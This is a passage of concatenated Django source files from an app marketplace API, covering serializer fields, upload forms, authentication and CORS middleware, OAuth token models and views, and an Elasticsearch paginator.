super(TranslationSerializerField, self).initialize(parent, field_name)
request = self.context.get('request', None)
if request and request.method == 'GET' and 'lang' in request.GET:
# A specific language was requested, we will only return one
# translation per field.
self.requested_language = request.GET['lang']
def fetch_all_translations(self, obj, source, field):
translations = field.__class__.objects.filter(id=field.id,
localized_string__isnull=False)
return dict((to_language(trans.locale), unicode(trans))
for trans in translations) if translations else None
def fetch_single_translation(self, obj, source, field):
return unicode(field) if field else None
def field_to_native(self, obj, field_name):
source = self.source or field_name
value = obj
for component in source.split('.'):
value = fields.get_component(value, component)
if value is None:
break
field = value
if field is None:
return None
if self.requested_language:
return self.fetch_single_translation(obj, source, field)
else:
return self.fetch_all_translations(obj, source, field)
def from_native(self, data):
if isinstance(data, basestring):
return data.strip()
elif isinstance(data, dict):
for key, value in data.items():
data[key] = value.strip()
return data
data = super(TranslationSerializerField, self).from_native(data)
return unicode(data)
def validate(self, value):
super(TranslationSerializerField, self).validate(value)
if self.min_length is None:
return
raise_error = True
if isinstance(value, basestring):
if len(value.strip()) >= self.min_length:
raise_error = False
else:
for k, v in value.items():
if len(v.strip()) >= self.min_length:
raise_error = False
break
if raise_error:
raise ValidationError(
self.error_messages['min_length'].format(num=self.min_length))
class ESTranslationSerializerField(TranslationSerializerField):
"""
Like TranslationSerializerField, but fetching the data from a dictionary
built from ES data that we previously attached on the object.
"""
suffix = '_translations'
def __init__(self, *args, **kwargs):
if kwargs.get('source'):
kwargs['source'] = '%s%s' % (kwargs['source'], self.suffix)
super(ESTranslationSerializerField, self).__init__(*args, **kwargs)
@classmethod
def attach_translations(cls, obj, data, source_name, target_name=None):
"""
Look for the translation of `source_name` in `data` and create a dict
with all translations for this field (which will look like
{'en-US': 'mytranslation'}) and attach it to a property on `obj`.
The property name is built with `target_name` and `cls.suffix`. If
`target_name` is None, `source_name` is used instead.
The suffix is necessary for two reasons:
1) The translations app won't let us set the dict on the real field
without making db queries
2) This also exactly matches how we store translations in ES, so we can
directly fetch the translations in the data passed to this method.
"""
if target_name is None:
target_name = source_name
target_key = '%s%s' % (target_name, cls.suffix)
source_key = '%s%s' % (source_name, cls.suffix)
setattr(obj, target_key, dict((v.get('lang', ''), v.get('string', ''))
for v in data.get(source_key, {}) or {}))
def fetch_all_translations(self, obj, source, field):
return field or None
def fetch_single_translation(self, obj, source, field):
translations = self.fetch_all_translations(obj, source, field) or {}
return (translations.get(self.requested_language) or
translations.get(obj.default_locale) or
translations.get(settings.LANGUAGE_CODE) or None)
def field_to_native(self, obj, field_name):
if field_name:
field_name = '%s%s' % (field_name, self.suffix)
return super(ESTranslationSerializerField, self).field_to_native(obj,
field_name)
class SplitField(fields.Field):
"""
A field composed of two separate fields: one used for input, and another
used for output. Most commonly used to accept a primary key for input and
use a full serializer for output.
Example usage:
app = SplitField(PrimaryKeyRelatedField(), AppSerializer())
"""
label = None
def __init__(self, input, output, **kwargs):
self.input = input
self.output = output
self.source = input.source
self._read_only = False
def initialize(self, parent, field_name):
"""
Update the context of the input and output fields to match the context
of this field.
"""
super(SplitField, self).initialize(parent, field_name)
for field in [self.input, self.output]:
if hasattr(field, 'context'):
field.context.update(self.context)
def get_read_only(self):
return self._read_only
def set_read_only(self, val):
self._read_only = val
self.input.read_only = val
self.output.read_only = val
read_only = property(get_read_only, set_read_only)
def field_from_native(self, data, files, field_name, into):
self.input.initialize(parent=self.parent, field_name=field_name)
self.input.field_from_native(data, files, field_name, into)
def field_to_native(self, obj, field_name):
self.output.initialize(parent=self.parent, field_name=field_name)
return self.output.field_to_native(obj, field_name)
class SlugOrPrimaryKeyRelatedField(serializers.RelatedField):
"""
Combines SlugRelatedField and PrimaryKeyRelatedField. Takes a
`render_as` argument (either "pk" or "slug") to indicate how to
serialize.
"""
default_error_messages = serializers.SlugRelatedField.default_error_messages
read_only = False
def __init__(self, *args, **kwargs):
self.render_as = kwargs.pop('render_as', 'pk')
if self.render_as not in ['pk', 'slug']:
raise ValueError("'render_as' must be one of 'pk' or 'slug', "
"not %r" % (self.render_as,))
self.slug_field = kwargs.pop('slug_field', 'slug')
super(SlugOrPrimaryKeyRelatedField, self).__init__(
*args, **kwargs)
def to_native(self, obj):
if self.render_as == 'slug':
return getattr(obj, self.slug_field)
else:
return obj.pk
def from_native(self, data):
if self.queryset is None:
raise Exception('Writable related fields must include a `queryset` '
'argument')
try:
return self.queryset.get(pk=data)
except:
try:
return self.queryset.get(**{self.slug_field: data})
except ObjectDoesNotExist:
msg = self.error_messages['does_not_exist'] % (
'pk_or_slug', smart_text(data))
raise ValidationError(msg)
class ReverseChoiceField(serializers.ChoiceField):
"""
A ChoiceField that serializes and de-serializes using the human-readable
version of the `choices_dict` that is passed.
The values in the choices_dict passed must be unique.
"""
def __init__(self, *args, **kwargs):
self.choices_dict = kwargs.pop('choices_dict')
kwargs['choices'] = self.choices_dict.items()
self.reversed_choices_dict = dict((v, k) for k, v
in self.choices_dict.items())
return super(ReverseChoiceField, self).__init__(*args, **kwargs)
def to_native(self, value):
"""
Convert "actual" value to "human-readable" when serializing.
"""
value = self.choices_dict.get(value, None)
return super(ReverseChoiceField, self).to_native(value)
def from_native(self, value):
"""
Convert "human-readable" value to "actual" when de-serializing.
"""
value = self.reversed_choices_dict.get(value, None)
return super(ReverseChoiceField, self).from_native(value)
class SlugChoiceField(serializers.ChoiceField):
"""
Companion to SlugChoiceFilter, this field accepts an id or a slug when
de-serializing, but always return a slug for serializing.
Like SlugChoiceFilter, it needs to be initialized with a `choices_dict`
mapping the slugs to objects with id and slug properties. This will be used
to overwrite the choices in the underlying code.
The values in the choices_dict passed must be unique.
"""
def __init__(self, *args, **kwargs):
# Create a choice dynamically to allow None, slugs and ids. Also store
# choices_dict and ids_choices_dict to re-use them later in to_native()
# and from_native().
self.choices_dict = kwargs.pop('choices_dict')
slugs_choices = self.choices_dict.items()
ids_choices = [(v.id, v) for v in self.choices_dict.values()]
self.ids_choices_dict = dict(ids_choices)
kwargs['choices'] = slugs_choices + ids_choices
return super(SlugChoiceField, self).__init__(*args, **kwargs)
def metadata(self):
"""Return metadata about the choices. It's customized to return the
name of each choice, because in that class, choices values are objects,
not strings directly. This makes it possible to serialize the metadata
without errors, which is necessary to answer OPTIONS (bug 984899)"""
data = super(SlugChoiceField, self).metadata()
data['choices'] = [{'value': v,
'display_name': unicode(getattr(n, 'name', n))}
for v, n in self.choices]
return data
def to_native(self, value):
if value:
choice = self.ids_choices_dict.get(value, None)
if choice is not None:
value = choice.slug
return super(SlugChoiceField, self).to_native(value)
def from_native(self, value):
if isinstance(value, basestring):
choice = self.choices_dict.get(value, None)
if choice is not None:
value = choice.id
return super(SlugChoiceField, self).from_native(value)
class SlugModelChoiceField(serializers.PrimaryKeyRelatedField):
def field_to_native(self, obj, field_name):
attr = self.source or field_name
value = getattr(obj, attr)
return getattr(value, 'slug', None)
def from_native(self, data):
if isinstance(data, basestring):
try:
data = self.queryset.only('pk').get(slug=data).pk
except ObjectDoesNotExist:
msg = self.error_messages['does_not_exist'] % smart_text(data)
raise serializers.ValidationError(msg)
return super(SlugModelChoiceField, self).from_native(data)
class LargeTextField(serializers.HyperlinkedRelatedField):
"""
Accepts a value for a field when unserializing, but serializes as
a link to a separate resource. Used for text too long for common
inclusion in a resource.
"""
def field_to_native(self, obj, field_name):
return self.to_native(obj)
def from_native(self, value):
return value
class SemiSerializerMethodField(serializers.SerializerMethodField):
"""
Used for fields serialized with a method on the serializer but who
need to handle unserialization manually.
"""
def field_from_native(self, data, files, field_name, into):
into[field_name] = data.get(field_name, None)
########NEW FILE########
__FILENAME__ = forms
import base64
import StringIO
from django import forms
from django.core.validators import URLValidator
from django.core.exceptions import ValidationError
import happyforms
from tower import ugettext_lazy as _lazy
import amo
from addons.models import Category
from mkt.developers.forms import JSONField, NewPackagedAppForm
from mkt.developers.utils import check_upload
class SluggableModelChoiceField(forms.ModelChoiceField):
"""
A model choice field that can accept either a slug or a pk and adapts
itself based on that. Requries: `sluggable_to_field_name` to be set as
the field that we will base the slug on.
"""
def __init__(self, *args, **kw):
if 'sluggable_to_field_name' not in kw:
raise ValueError('sluggable_to_field_name is required.')
self.sluggable_to_field_name = kw.pop('sluggable_to_field_name')
return super(SluggableModelChoiceField, self).__init__(*args, **kw)
def to_python(self, value):
try:
if not value.isdigit():
self.to_field_name = self.sluggable_to_field_name
except AttributeError:
pass
return super(SluggableModelChoiceField, self).to_python(value)
def parse(file_, require_name=False, require_type=None):
try:
if not set(['data', 'type']).issubset(set(file_.keys())):
raise forms.ValidationError('Type and data are required.')
except AttributeError:
raise forms.ValidationError('File must be a dictionary.')
try:
data = base64.b64decode(file_['data'])
except TypeError:
raise forms.ValidationError('File must be base64 encoded.')
result = StringIO.StringIO(data)
result.size = len(data)
if require_type and file_.get('type', '') != require_type:
raise forms.ValidationError('Type must be %s.' % require_type)
if require_name and not file_.get('name', ''):
raise forms.ValidationError('Name not specified.')
result.name = file_.get('name', '')
return result
class NewPackagedForm(NewPackagedAppForm):
upload = JSONField()
def clean_upload(self):
self.cleaned_data['upload'] = parse(self.cleaned_data
.get('upload', {}),
require_name=True,
require_type='application/zip')
return super(NewPackagedForm, self).clean_upload()
class FileJSONForm(happyforms.Form):
file = JSONField(required=True)
def clean_file(self):
file_ = self.cleaned_data.get('file', {})
file_obj = parse(file_)
errors, hash_ = check_upload(file_obj, self.upload_type, file_['type'])
if errors:
raise forms.ValidationError(errors)
self.hash_ = hash_
return file_
def clean(self):
self.cleaned_data[self.hash_name] = getattr(self, 'hash_', None)
return self.cleaned_data
class PreviewJSONForm(FileJSONForm):
position = forms.IntegerField(required=True)
def __init__(self, *args, **kwargs):
self.upload_type = 'preview'
self.hash_name = 'upload_hash'
super(PreviewJSONForm, self).__init__(*args, **kwargs)
class IconJSONForm(FileJSONForm):
def __init__(self, *args, **kwargs):
self.upload_type = 'icon'
self.hash_name = 'icon_upload_hash'
super(IconJSONForm, self).__init__(*args, **kwargs)
class CategoryForm(happyforms.Form):
# The CategoryFormSet is far too complicated, I don't follow it.
# Hopefully this is easier.
categories = forms.ModelMultipleChoiceField(
queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
class CustomNullBooleanSelect(forms.Select):
"""A custom NullBooleanSelect, that uses true/false/'' values instead of
1/2/3. See also https://code.djangoproject.com/ticket/17210."""
def __init__(self, attrs=None):
choices = ((u'', _lazy('Unknown')),
(u'true', _lazy('Yes')),
(u'false', _lazy('No')))
super(CustomNullBooleanSelect, self).__init__(attrs, choices)
def render(self, name, value, attrs=None, choices=()):
try:
value = {
True: u'true',
False: u'false',
u'true': u'true',
u'false': u'false'
}[value]
except KeyError:
value = u''
return super(CustomNullBooleanSelect, self).render(name, value, attrs,
choices)
def value_from_datadict(self, data, files, name):
value = data.get(name, None)
return {
u'true': True,
True: True,
'True': True,
u'false': False,
'False': False,
False: False
}.get(value, None)
def _has_changed(self, initial, data):
# For a CustomNullBooleanSelect, None (unknown) and False (No)
# are *not* the same.
if initial is not None:
initial = bool(initial)
if data is not None:
data = bool(data)
return initial != data
class SchemeURLValidator(URLValidator):
def __init__(self, *args, **kwargs):
self.schemes = kwargs.pop('schemes', ['http', 'https', 'ftp', 'ftps'])
super(URLValidator, self).__init__(*args, **kwargs)
def __call__(self, value):
super(URLValidator, self).__call__(value)
supports_scheme = lambda scheme: value.startswith(scheme + '://')
if not any(supports_scheme(scheme) for scheme in self.schemes):
raise ValidationError('Scheme should be one of {0}.'.format(
', '.join(self.schemes)))
########NEW FILE########
__FILENAME__ = http
from django.http import HttpResponse
class HttpPaymentRequired(HttpResponse):
status_code = 402
class HttpTooManyRequests(HttpResponse):
status_code = 429
class HttpLegallyUnavailable(HttpResponse):
"""
451: Unavailable For Legal Reasons
http://tools.ietf.org/html/draft-tbray-http-legally-restricted-status-00
"""
status_code = 451
########NEW FILE########
__FILENAME__ = middleware
import hashlib
import hmac
import re
import time
from urllib import urlencode
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core.cache import cache
from django.middleware.gzip import GZipMiddleware as BaseGZipMiddleware
from django.middleware.transaction import TransactionMiddleware
from django.utils.cache import patch_vary_headers
import commonware.log
from django_statsd.clients import statsd
from django_statsd.middleware import (GraphiteRequestTimingMiddleware,
TastyPieRequestTimingMiddleware)
from multidb.pinning import (pin_this_thread, this_thread_is_pinned,
unpin_this_thread)
from multidb.middleware import PinningRouterMiddleware
from mkt.api.models import Access, ACCESS_TOKEN, Token
from mkt.api.oauth import OAuthServer
from mkt.carriers import get_carrier
from users.models import UserProfile
log = commonware.log.getLogger('z.api')
class RestOAuthMiddleware(object):
"""
This is based on https://github.com/amrox/django-tastypie-two-legged-oauth
with permission.
"""
def process_request(self, request):
# For now we only want these to apply to the API.
# This attribute is set in RedirectPrefixedURIMiddleware.
if not getattr(request, 'API', False):
return
if not settings.SITE_URL:
raise ValueError('SITE_URL is not specified')
# Set up authed_from attribute.
if not hasattr(request, 'authed_from'):
request.authed_from = []
auth_header_value = request.META.get('HTTP_AUTHORIZATION')
if (not auth_header_value and
'oauth_token' not in request.META['QUERY_STRING']):
self.user = AnonymousUser()
log.info('No HTTP_AUTHORIZATION header')
return
# Set up authed_from attribute.
auth_header = {'Authorization': auth_header_value}
method = getattr(request, 'signed_method', request.method)
oauth = OAuthServer()
if ('oauth_token' in request.META['QUERY_STRING'] or
'oauth_token' in auth_header_value):
# This is 3-legged OAuth.
log.info('Trying 3 legged OAuth')
try:
valid, oauth_request = oauth.verify_request(
request.build_absolute_uri(),
method, headers=auth_header,
require_resource_owner=True)
except ValueError:
log.error('ValueError on verifying_request', exc_info=True)
return
if not valid:
log.error(u'Cannot find APIAccess token with that key: %s'
% oauth.attempted_key)
return
uid = Token.objects.filter(
token_type=ACCESS_TOKEN,
key=oauth_request.resource_owner_key).values_list(
'user_id', flat=True)[0]
request.amo_user = UserProfile.objects.select_related(
'user').get(pk=uid)
request.user = request.amo_user
else:
# This is 2-legged OAuth.
log.info('Trying 2 legged OAuth')
try:
valid, oauth_request = oauth.verify_request(
request.build_absolute_uri(),
method, headers=auth_header,
require_resource_owner=False)
except ValueError:
log.error('ValueError on verifying_request', exc_info=True)
return
if not valid:
log.error(u'Cannot find APIAccess token with that key: %s'
% oauth.attempted_key)
return
uid = Access.objects.filter(
key=oauth_request.client_key).values_list(
'user_id', flat=True)[0]
request.amo_user = UserProfile.objects.select_related(
'user').get(pk=uid)
request.user = request.amo_user
# But you cannot have one of these roles.
denied_groups = set(['Admins'])
roles = set(request.amo_user.groups.values_list('name', flat=True))
if roles and roles.intersection(denied_groups):
log.info(u'Attempt to use API with denied role, user: %s'
% request.amo_user.pk)
# Set request attributes back to None.
request.user = request.amo_user = None
return
if request.user:
request.authed_from.append('RestOAuth')
log.info('Successful OAuth with user: %s' % request.user)
class RestSharedSecretMiddleware(object):
def process_request(self, request):
# For now we only want these to apply to the API.
# This attribute is set in RedirectPrefixedURIMiddleware.
if not getattr(request, 'API', False):
return
# Set up authed_from attribute.
if not hasattr(request, 'authed_from'):
request.authed_from = []
header = request.META.get('HTTP_AUTHORIZATION', '').split(None, 1)
if header and header[0].lower() == 'mkt-shared-secret':
auth = header[1]
else:
auth = request.GET.get('_user')
if not auth:
log.info('API request made without shared-secret auth token')
return
try:
email, hm, unique_id = str(auth).split(',')
consumer_id = hashlib.sha1(
email + settings.SECRET_KEY).hexdigest()
matches = hmac.new(unique_id + settings.SECRET_KEY,
consumer_id, hashlib.sha512).hexdigest() == hm
if matches:
try:
request.amo_user = UserProfile.objects.get(email=email)
request.user = request.amo_user
request.authed_from.append('RestSharedSecret')
except UserProfile.DoesNotExist:
log.info('Auth token matches absent user (%s)' % email)
return
else:
log.info('Shared-secret auth token does not match')
return
log.info('Successful SharedSecret with user: %s' % request.user.pk)
return
except Exception, e:
log.info('Bad shared-secret auth data: %s (%s)', auth, e)
return
class APITransactionMiddleware(TransactionMiddleware):
"""Wrap the transaction middleware so we can use it in the API only."""
def process_request(self, request):
if getattr(request, 'API', False):
return (super(APITransactionMiddleware, self)
.process_request(request))
def process_exception(self, request, exception):
if getattr(request, 'API', False):
return (super(APITransactionMiddleware, self)
.process_exception(request, exception))
def process_response(self, request, response):
if getattr(request, 'API', False):
return (super(APITransactionMiddleware, self)
.process_response(request, response))
return response
# How long to set the time-to-live on the cache.
PINNING_SECONDS = int(getattr(settings, 'MULTIDB_PINNING_SECONDS', 15))
class APIPinningMiddleware(PinningRouterMiddleware):
"""
Similar to multidb, but we can't rely on cookies. Instead we cache the
users who are to be pinned with a cache timeout. Users who are to be
pinned are those that are not anonymous users and who are either making
an updating request or who are already in our cache as having done one
recently.
If not in the API, will fall back to the cookie pinning middleware.
Note: because the authentication process happens late when we are in the
API, process_request() will be manually called from authentication classes
when a user is successfully authenticated by one of those classes.
"""
def cache_key(self, request):
"""Returns cache key based on user ID."""
return u'api-pinning:%s' % request.user.id
def process_request(self, request):
if not getattr(request, 'API', False):
return super(APIPinningMiddleware, self).process_request(request)
if (request.user and not request.user.is_anonymous() and
(cache.get(self.cache_key(request)) or
request.method in ['DELETE', 'PATCH', 'POST', 'PUT'])):
statsd.incr('api.db.pinned')
pin_this_thread()
return
statsd.incr('api.db.unpinned')
unpin_this_thread()
def process_response(self, request, response):
if not getattr(request, 'API', False):
return (super(APIPinningMiddleware, self)
.process_response(request, response))
response['API-Pinned'] = str(this_thread_is_pinned())
if (request.user and not request.user.is_anonymous() and (
request.method in ['DELETE', 'PATCH', 'POST', 'PUT'] or
getattr(response, '_db_write', False))):
cache.set(self.cache_key(request), 1, PINNING_SECONDS)
return response
class CORSMiddleware(object):
def process_response(self, request, response):
# This is mostly for use by tastypie. Which doesn't really have a nice
# hook for figuring out if a response should have the CORS headers on
# it. That's because it will often error out with immediate HTTP
# responses.
fireplace_url = settings.FIREPLACE_URL
fireplacey = request.META.get('HTTP_ORIGIN') == fireplace_url
response['Access-Control-Allow-Headers'] = (
'X-HTTP-Method-Override, Content-Type')
if fireplacey or getattr(request, 'CORS', None):
# If this is a request from our hosted frontend, allow cookies.
if fireplacey:
response['Access-Control-Allow-Origin'] = fireplace_url
response['Access-Control-Allow-Credentials'] = 'true'
else:
response['Access-Control-Allow-Origin'] = '*'
options = [h.upper() for h in request.CORS]
if not 'OPTIONS' in options:
options.append('OPTIONS')
response['Access-Control-Allow-Methods'] = ', '.join(options)
# The headers that the response will be able to access.
response['Access-Control-Expose-Headers'] = (
'API-Filter, API-Status, API-Version')
return response
v_re = re.compile('^/api/v(?P<version>\d+)/|^/api/')
def detect_api_version(request):
url = request.META.get('PATH_INFO', '')
version = v_re.match(url).group('version')
if not version:
version = 1
return version
class APIVersionMiddleware(object):
"""
Figures out what version of the API they are on. Maybe adds in a
deprecation notice.
"""
def process_request(self, request):
if getattr(request, 'API', False):
version = detect_api_version(request)
request.API_VERSION = int(version)
def process_response(self, request, response):
if not getattr(request, 'API', False):
return response
version = getattr(request, 'API_VERSION', None)
if version is None:
version = detect_api_version(request)
response['API-Version'] = version
if version < settings.API_CURRENT_VERSION:
response['API-Status'] = 'Deprecated'
return response
class APIFilterMiddleware(object):
"""
Add an API-Filter header containing a urlencoded string of filters applied
to API requests.
"""
def process_response(self, request, response):
if getattr(request, 'API', False) and response.status_code < 500:
devices = []
for device in ('GAIA', 'MOBILE', 'TABLET'):
if getattr(request, device, False):
devices.append(device.lower())
filters = (
('carrier', get_carrier() or ''),
('device', devices),
('lang', request.LANG),
('pro', request.GET.get('pro', '')),
('region', request.REGION.slug),
)
response['API-Filter'] = urlencode(filters, doseq=True)
patch_vary_headers(response, ['API-Filter'])
return response
class TimingMiddleware(GraphiteRequestTimingMiddleware):
"""
A wrapper around django_statsd timing middleware that sends different
statsd pings if being used in API.
"""
def process_view(self, request, *args):
if getattr(request, 'API', False):
TastyPieRequestTimingMiddleware().process_view(request, *args)
else:
super(TimingMiddleware, self).process_view(request, *args)
def _record_time(self, request):
pre = 'api' if getattr(request, 'API', False) else 'view'
if hasattr(request, '_start_time'):
ms = int((time.time() - request._start_time) * 1000)
data = {'method': request.method,
'module': request._view_module,
'name': request._view_name,
'pre': pre}
statsd.timing('{pre}.{module}.{name}.{method}'.format(**data), ms)
statsd.timing('{pre}.{module}.{method}'.format(**data), ms)
statsd.timing('{pre}.{method}'.format(**data), ms)
class GZipMiddleware(BaseGZipMiddleware):
"""
Wrapper around GZipMiddleware, which only enables gzip for API responses.
It specifically avoids enabling it for non-API responses because that might
leak security tokens through the BREACH attack.
https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
http://breachattack.com/
https://bugzilla.mozilla.org/show_bug.cgi?id=960752
"""
def process_response(self, request, response):
if not getattr(request, 'API', False):
return response
return super(GZipMiddleware, self).process_response(request, response)
########NEW FILE########
__FILENAME__ = models
import os
import time
from django.db import models
from aesfield.field import AESField
from amo.models import ModelBase
from users.models import UserProfile
REQUEST_TOKEN = 0
ACCESS_TOKEN = 1
TOKEN_TYPES = ((REQUEST_TOKEN, u'Request'), (ACCESS_TOKEN, u'Access'))
class Access(ModelBase):
key = models.CharField(max_length=255, unique=True)
secret = AESField(max_length=255, aes_key='api:access:secret')
user = models.ForeignKey(UserProfile)
redirect_uri = models.CharField(max_length=255)
app_name = models.CharField(max_length=255)
class Meta:
db_table = 'api_access'
class Token(ModelBase):
token_type = models.SmallIntegerField(choices=TOKEN_TYPES)
creds = models.ForeignKey(Access)
key = models.CharField(max_length=255)
secret = models.CharField(max_length=255)
timestamp = models.IntegerField()
user = models.ForeignKey(UserProfile, null=True)
verifier = models.CharField(max_length=255, null=True)
class Meta:
db_table = 'oauth_token'
@classmethod
def generate_new(cls, token_type, creds, user=None):
return cls.objects.create(
token_type=token_type,
creds=creds,
key=generate(),
secret=generate(),
timestamp=time.time(),
verifier=generate() if token_type == REQUEST_TOKEN else None,
user=user)
class Nonce(ModelBase):
nonce = models.CharField(max_length=128)
timestamp = models.IntegerField()
client_key = models.CharField(max_length=255)
request_token = models.CharField(max_length=128, null=True)
access_token = models.CharField(max_length=128, null=True)
class Meta:
db_table = 'oauth_nonce'
unique_together = ('nonce', 'timestamp', 'client_key',
'request_token', 'access_token')
def generate():
return os.urandom(64).encode('hex')
########NEW FILE########
__FILENAME__ = oauth
import string
from urllib import urlencode
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import commonware.log
from oauthlib import oauth1
from oauthlib.common import safe_string_equals
from amo.decorators import login_required
from amo.utils import urlparams
from mkt.api.models import Access, Nonce, Token, REQUEST_TOKEN, ACCESS_TOKEN
DUMMY_CLIENT_KEY = u'DummyOAuthClientKeyString'
DUMMY_TOKEN = u'DummyOAuthToken'
DUMMY_SECRET = u'DummyOAuthSecret'
log = commonware.log.getLogger('z.api')
class OAuthServer(oauth1.Server):
safe_characters = set(string.printable)
nonce_length = (7, 128)
access_token_length = (8, 128)
request_token_length = (8, 128)
verifier_length = (8, 128)
client_key_length = (8, 128)
enforce_ssl = False # SSL enforcement is handled by ops. :-)
def validate_client_key(self, key):
self.attempted_key = key
return Access.objects.filter(key=key).exists()
def get_client_secret(self, key):
# This method returns a dummy secret on failure so that auth
# success and failure take a codepath with the same run time,
# to prevent timing attacks.
try:
# OAuthlib needs unicode objects, django-aesfield returns a string.
return Access.objects.get(key=key).secret.decode('utf8')
except Access.DoesNotExist:
return DUMMY_SECRET
@property
def dummy_client(self):
return DUMMY_CLIENT_KEY
@property
def dummy_request_token(self):
return DUMMY_TOKEN
@property
def dummy_access_token(self):
return DUMMY_TOKEN
def validate_timestamp_and_nonce(self, client_key, timestamp, nonce,
request_token=None, access_token=None):
n, created = Nonce.objects.safer_get_or_create(
defaults={'client_key': client_key},
nonce=nonce, timestamp=timestamp,
request_token=request_token,
access_token=access_token)
return created
def validate_requested_realm(self, client_key, realm):
return True
def validate_realm(self, client_key, access_token, uri=None,
required_realm=None):
return True
def validate_redirect_uri(self, client_key, redirect_uri):
return True
def validate_request_token(self, client_key, request_token):
# This method must take the same amount of time/db lookups for
# success and failure to prevent timing attacks.
return Token.objects.filter(token_type=REQUEST_TOKEN,
creds__key=client_key,
key=request_token).exists()
def validate_access_token(self, client_key, access_token):
# This method must take the same amount of time/db lookups for
# success and failure to prevent timing attacks.
return Token.objects.filter(token_type=ACCESS_TOKEN,
creds__key=client_key,
key=access_token).exists()
def validate_verifier(self, client_key, request_token, verifier):
# This method must take the same amount of time/db lookups for
# success and failure to prevent timing attacks.
try:
t = Token.objects.get(key=request_token, token_type=REQUEST_TOKEN)
candidate = t.verifier
except Token.DoesNotExist:
candidate = ''
return safe_string_equals(candidate, verifier)
def get_request_token_secret(self, client_key, request_token):
# This method must take the same amount of time/db lookups for
# success and failure to prevent timing attacks.
try:
t = Token.objects.get(key=request_token, creds__key=client_key,
token_type=REQUEST_TOKEN)
return t.secret
except Token.DoesNotExist:
return DUMMY_SECRET
def get_access_token_secret(self, client_key, request_token):
# This method must take the same amount of time/db lookups for
# success and failure to prevent timing attacks.
try:
t = Token.objects.get(key=request_token, creds__key=client_key,
token_type=ACCESS_TOKEN)
except Token.DoesNotExist:
return DUMMY_SECRET
return t.secret
@csrf_exempt
def access_request(request):
oa = OAuthServer()
try:
valid, oauth_request = oa.verify_access_token_request(
request.build_absolute_uri(),
request.method,
request.body,
{'Authorization': request.META.get('HTTP_AUTHORIZATION'),
'Content-Type': request.META.get('CONTENT_TYPE')
})
except ValueError:
valid = False
if valid:
req_t = Token.objects.get(
token_type=REQUEST_TOKEN,
key=oauth_request.resource_owner_key)
t = Token.generate_new(
token_type=ACCESS_TOKEN,
creds=req_t.creds,
user=req_t.user)
# Clean up as we go.
req_t.delete()
return HttpResponse(
urlencode({'oauth_token': t.key,
'oauth_token_secret': t.secret}),
content_type='application/x-www-form-urlencoded')
else:
log.error('Invalid OAuth request for acquiring access token')
return HttpResponse(status=401)
@csrf_exempt
def token_request(request):
oa = OAuthServer()
try:
valid, oauth_request = oa.verify_request_token_request(
request.build_absolute_uri(),
request.method,
request.body,
{'Authorization': request.META.get('HTTP_AUTHORIZATION'),
'Content-Type': request.META.get('CONTENT_TYPE')
})
except ValueError:
valid = False
if valid:
consumer = Access.objects.get(key=oauth_request.client_key)
t = Token.generate_new(token_type=REQUEST_TOKEN, creds=consumer)
return HttpResponse(
urlencode({'oauth_token': t.key,
'oauth_token_secret': t.secret,
'oauth_callback_confirmed': True}),
content_type='application/x-www-form-urlencoded')
else:
log.error('Invalid OAuth request for acquiring request token')
return HttpResponse(status=401)
@csrf_exempt
@login_required
def authorize(request):
if request.method == 'GET' and 'oauth_token' in request.GET:
try:
t = Token.objects.get(token_type=REQUEST_TOKEN,
key=request.GET['oauth_token'])
except Token.DoesNotExist:
log.error('Invalid OAuth request for obtaining user authorization')
return HttpResponse(status=401)
return render(request, 'developers/oauth_authorize.html',
{'app_name': t.creds.app_name,
'oauth_token': request.GET['oauth_token']})
elif request.method == 'POST':
token = request.POST.get('oauth_token')
try:
t = Token.objects.get(token_type=REQUEST_TOKEN,
key=token)
except Token.DoesNotExist:
return HttpResponse(status=401)
if 'grant' in request.POST:
t.user = request.user
t.save()
return HttpResponseRedirect(
urlparams(t.creds.redirect_uri, oauth_token=token,
oauth_verifier=t.verifier))
elif 'deny' in request.POST:
t.delete()
return HttpResponse(status=200)
else:
log.error('Invalid OAuth request for user access authorization')
return HttpResponse(status=401)
########NEW FILE########
__FILENAME__ = paginator
import urlparse
from django.core.paginator import EmptyPage, Page, PageNotAnInteger, Paginator
from django.http import QueryDict
from django.utils.http import urlencode
from rest_framework import pagination, serializers
class ESPaginator(Paginator):
"""
A better paginator for search results
The normal Paginator does a .count() query and then a slice. Since ES
results contain the total number of results, we can take an optimistic
slice and then adjust the count.
"""
def validate_number(self, number):
"""
Validates the given 1-based page number.
This class overrides the default behavior and ignores the upper bound.
"""
try:
number = int(number)
except (TypeError, ValueError):
raise PageNotAnInteger('That page number is not an integer')
if number < 1:
raise EmptyPage('That page number is less than 1')
return number
def page(self, number):
"""
Returns a page object.
This class overrides the default behavior and ignores "orphans" and
assigns the count from the ES result to the Paginator.
"""
number = self.validate_number(number)
bottom = (number - 1) * self.per_page
top = bottom + self.per_page
page = Page(self.object_list[bottom:top], number, self)
# Force the search to evaluate and then attach the count. We want to
# avoid an extra useless query even if there are no results, so we
# directly fetch the count from _results_cache instead of calling
# page.object_list.count().
# FIXME: replace by simply calling page.object_list.count() when
# https://github.com/mozilla/elasticutils/pull/212 is merged and
# released.
page.object_list.execute()
self._count = page.object_list._results_cache.count
return page
class MetaSerializer(serializers.Serializer):
"""
Serializer for the 'meta' dict holding pagination info that allows to stay
backwards-compatible with the way tastypie does pagination (using offsets
instead of page numbers), while still using a "standard" Paginator class.
"""
next = serializers.SerializerMethodField('get_next')
previous = serializers.SerializerMethodField('get_previous')
total_count = serializers.SerializerMethodField('get_total_count')
offset = serializers.SerializerMethodField('get_offset')
limit = serializers.SerializerMethodField('get_limit')
def replace_query_params(self, url, params):
(scheme, netloc, path, query, fragment) = urlparse.urlsplit(url)
query_dict = QueryDict(query).dict()
query_dict.update(params)
query = urlencode(query_dict)
return urlparse.urlunsplit((scheme, netloc, path, query, fragment))
def get_offset_link_for_page(self, page, number):
request = self.context.get('request')
url = request and request.get_full_path() or ''
number = number - 1 # Pages are 1-based, but offsets are 0-based.
per_page = page.paginator.per_page
return self.replace_query_params(url, {'offset': number * per_page,
'limit': per_page})
def get_next(self, page):
if not page.has_next():
return None
return self.get_offset_link_for_page(page, page.next_page_number())
def get_previous(self, page):
if not page.has_previous():
return None
return self.get_offset_link_for_page(page, page.previous_page_number())
def get_total_count(self, page):
return page.paginator.count
def get_offset(self, page):
index = page.start_index()
if index > 0:
